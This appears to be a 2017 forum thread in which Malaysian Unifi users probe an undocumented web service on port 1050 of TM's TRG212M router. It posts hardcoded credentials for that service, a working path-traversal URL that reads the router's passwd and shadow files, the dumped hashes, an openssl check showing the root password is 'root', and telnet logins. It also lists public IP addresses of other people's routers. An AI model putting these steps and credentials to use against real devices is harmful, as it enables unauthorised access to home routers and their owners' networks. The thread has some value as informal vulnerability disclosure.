I did further checking on port 1050 on the TRG212M. It's a web server running on port 1050. Very interesting.

118.100.67.125 is a random TRG212M I found on the internet. Can't login, known operator and admin passwords do not work.





It remains open even if you disable remote management.

175.144.118.252 is another TRG212M.


This post has been edited by soonwai: Mar 30 2017, 06:27 PM

perhaps it was the default maintenance port on TM center for troubleshoot problem when we call them?

RG-MARITIME-TRG212M

I don't think so. If that's the case then it's basically a backdoor for TM. Other TM routers don't have this http server running. In any case TM uses TR069 & FreeACS over vlan209 for remote configuration and the TRG212M supports this.

Maybe they changed the password for Operator/Admin?
Mine is not the default password...

Just tried to log in on mine but it won't accept the password that I use for Operator/Admin through LAN...


This post has been edited by biloxee: Mar 30 2017, 08:10 PM

I tried both operator and admin with known passwords. I can login at the normal router config webpage but not the one on port 1050.

Yup, I just tried on mine too. It won't accept my regular pwd that I use for the config page.
Hidden account?

Sigh. I wonder if TM willing to exchange this router...

Did anyone from klang managed to get their speed upgraded?

Try this for the http server at port 1050.
Username: ccs
Password: Tmacs_1#58

That should get you authenticated and then a blank page.

This post has been edited by soonwai: Mar 30 2017, 09:59 PM

That's not your router lah, I'm talking about ur wi-fi router

RG-MARITIME-TRG212M is biloxee's wifi router.

Aiks, so he is using latest router or is the DIR-615 newer?

After many rounds of complain finally able to get good speed from my unif**k 100mbps plan

Same. I get a blank page. Where did you get the user/pwd from?

From /etc/config.xml in the router. You'll have to telnet or ssh in.

It seems like it's something to do with TR069 but not sure why it's exposed to the internet nor why the port cannot be closed.

The password for telnet is root/root obtained with this. The ../../.. part is a well known file traversal vulnerability with many older routers.

http://192.168.0.1:8080/cgi-bin/webproc?getpage=html/../../../var/passwd&var:menu=status&var:page=system_msg
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh

http://192.168.0.1:8080/cgi-bin/webproc?getpage=html/../../../var/shadow&var:menu=status&var:page=system_msg
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

Just google $1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI. and you'll find that it is the hash for the string "root"

Verified here:
$ openssl passwd -1 -salt BOYmzSKq root
$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.

This post has been edited by soonwai: Mar 30 2017, 11:31 PM

Ok ok, thanks soonwai.

The user/pass for telnet is root/root. I updated my previous post on how to check it. You can also use tw/tw if it's not commented out.

For some reason, it's not the usual operator user/password that you set in the web config.

Actually, now that I know where config.xml is located, all you need is the URL below:



This post has been edited by soonwai: Mar 30 2017, 11:54 PM

yup..got it since last month dy..
area near CIMB CASA Klang Branch

What did they do?

I think they do something with the port at the unifi sub station. Their technicians went there & goto my house to do some setting plus reset with their laptop